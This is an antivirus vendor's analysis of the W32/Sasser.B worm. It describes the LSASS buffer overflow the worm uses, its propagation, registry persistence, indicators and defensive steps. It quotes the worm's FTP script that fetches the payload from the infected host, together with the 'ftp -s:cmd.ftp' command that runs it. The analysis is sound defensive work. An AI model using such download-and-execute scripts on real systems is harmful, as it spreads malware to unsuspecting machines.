W32/Sasser.B
Analysis
Specifics
This 32-bit virus is a minor variant of W32/Sasser.A-net
- it also has a packed file size of 15,872 bytes and
was coded using Visual C++. The only intention of this
virus is to spread to other systems across the Internet,
and quickly. This threat takes advantage of a vulnerability
of a buffer overflow in Local Security Authority Subsystem
Service (LSASS) [ref: MS04-011
and CAN-2003-0533].
The buffer overrun exists because of an unchecked buffer in the Local Security Authority Subsystem Service. This service is responsible for managing local security, domain authentication, and Active Directory processes. It handles authentication for the client and for the server. It also contains features that are used to support Active Directory utilities.
The virus will bind with TCP port 5554 and act as an FTP server. The virus will then send SYN packets to random IP addresses across the Internet to destination TCP port 445. IP addresses which are live will respond with an "ACK" packet. The virus will then target that IP address by initiating its LSASS exploit code in an effort to gain access to that system. If the target can be compromised, the virus will write into the IPC$ share an FTP script file which will request the virus from the infected system. The virus is downloaded from the infected system from TCP port 5554 to the target. The file received will then be executed, and the cycle will continue.
Loading At Windows Startup
If this virus is run, it will copy itself to the Windows
folder and register itself to run at each Windows startup
-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
"avserve2.exe" = C:\WINNT\avserve2.exe
While the virus is memory resident, it creates two Mutex references -
Jobaka3
JumpallsNlsTillt
Virus Delivery Through FTP
On an infected system, the virus may write files with
random names, but a specific format into the System32
folder, such as these -
98723_up.exe
23712_up.exe
56919_up.exe
The virus will bind to TCP port 5554 and use this channel to operate an FTP emulation. The virus creates a file "c:\win.log" and writes the infected system IP address into this file. If the virus is able to compromise a target, it will open a remote shell on the target on TCP port 9996. Next the virus will write an FTP script file as "cmd.ftp" with the following instructions -
open undefinedIP Address
of infected systemundefined 5554
anonymous
user
bin
get *_up.exe
bye
The virus remotely executes the FTP script using the
instruction "ftp -s:cmd.ftp". When the file
is retrieved to the target system, it is then executed
and the "cmd.ftp" script is then deleted.
Recommended Action
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- Using the FortiGate manager, block external to internal
traffic using UDP ports 135, 137, 138, and 445, and
TCP ports 135, 139, 445, 593, 5554 and 9996
- For Windows XP users, implement use of Personal
Firewall - this feature automatically blocks unsolicited
inbound traffic and would protect against this Internet
worm
- Ensure affected systems are updated with the latest Microsoft security patches, and specifically the update which addresses this vulnerability in MS04-011
Telemetry
Detection Availability
FortiClient | |
---|---|
Extreme | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2023-04-03 | 91.02022 |